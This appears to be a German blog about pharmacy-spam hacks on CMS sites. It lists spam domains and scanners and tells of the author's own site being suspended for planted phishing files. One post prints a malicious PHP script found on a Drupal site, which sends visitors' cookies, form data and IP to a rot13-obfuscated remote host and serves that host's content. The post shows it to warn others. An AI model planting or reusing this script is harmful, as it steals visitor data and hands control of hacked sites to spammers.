Pharmacy Spam

Kriminelle Internetapotheken mieten keine eigenen Server an, sondern nisten sich per Schadskripten auf Fremdservern ein. Diese Aktionen sind nicht auf Anhieb sichtbar, feststellbar über die Eingabe bei Google des eigenen Site-Namens plus Medikamentenbezeichnungen.

Beispielsweise wird dann auf folgende Seiten verwiesen: ed-pillen.de Online Apotheke, EURO Pharmacy, EXS Pharmacy, RX-365 Online Apotheke, Canadian Drug Store, Tab md, medscom.com, cliopharma.com, pharmacyworld, Safe Med Stock.

Die Schaddateien liegen in diversen CMS, Typo3, WordPress, Joomla etc. Irgendwo gibt es immer eine Lücke. Auffällig werden sie dann auf jeden Fall in den Log-Dateien.

Infos zu Spam-Hacks:

http://aw-snap.info/articles/spam-hacks.php

Typo3-Hack: http://blog.namics.com/2012/01/a-study-in-viagra.html

Security-Checks:

http://www.unmaskparasites.com/

http://sitecheck.sucuri.net/

Fieses Spam-Skript

Die Tage habe ich in einem Drupal-Unterordner ein fieses Spam-Skript ausfindig gemacht. Dieses führt dazu, dass dort eine Seite oder Seiten aufgebaut werden, die anderen Zwecken dient als der der Homepage, z.B. lässt sich auf diese Weise der Medikamentenhandel vorantreiben. Hier ist das gute Stück (man beachte die rot13-Verschlüsselung der URL):

$post = Array(
'self' => 'http://' . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . $_SERVER['REQUEST_URI'],
'sub_id' => '',
//'page' => $_REQUEST['p'],
'PHP_SELF' => $_SERVER['PHP_SELF'],
'SERVER_PROTOCOL' => $_SERVER['SERVER_PROTOCOL'],
'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'],
'HTTP_REFERER' => $_SERVER['HTTP_REFERER'],
'HTTP_USER_AGENT' => $_SERVER['HTTP_USER_AGENT'],
'HTTP_ACCEPT_CHARSET' => $_SERVER['HTTP_ACCEPT_CHARSET'],
'GET' => serialize($_GET),
'POST' => serialize($_POST),
'COOKIE' => serialize($_COOKIE),
);
$masterUrl = str_rot13('uggc://klm.uhynubfg.arg/');
$url = "{$masterUrl}rgw.php";
$req = new HttpRequest($useCurl, $requestTimeout);
$pageTxt = $req->request($url, $post);
//echo $pageTxt;
if (!$pageTxt)
die404();
$page = unserialize($pageTxt);
//print_r($page);
if ($page['seal'] != $seal) {
//echo $pageTxt; // TODO: *** DEBUG, delete this!!! ***
die404();
}
foreach ($page['headers'] as $header) {
header($header);
}
//echo "

";
//print_r($page);
//echo "

";
echo $page['content'];
?>

Wie gegen den Mist wehren? Neben dem Üblichen, immer die aktuellste Version einspielen, Permissions etc, ist eine Webserver-Log-Analyse, z.B. via Webalizer nützlich.

k-braungardt.de wegen phishing-content heute kurzfristig gesperrt

Hosteurope hat, einmalig in der Geschichte von k-braungardt.de, die Site gesperrt wegen phishing-content. Zuvor hatte ich bereits einen freundlichen Hinweis von Google erhalten. Das Zeugs war im wp-content/upload-Folder untergebracht, gestern laut timestamp.
HE hat mich aufgefordert die Dateien zu entfernen, WP zu updaten und alle Rechner mit FTP-Zugang einem Virenscan zu unterziehen.
Alles getan, mal schaun, ob da noch was nachkommt.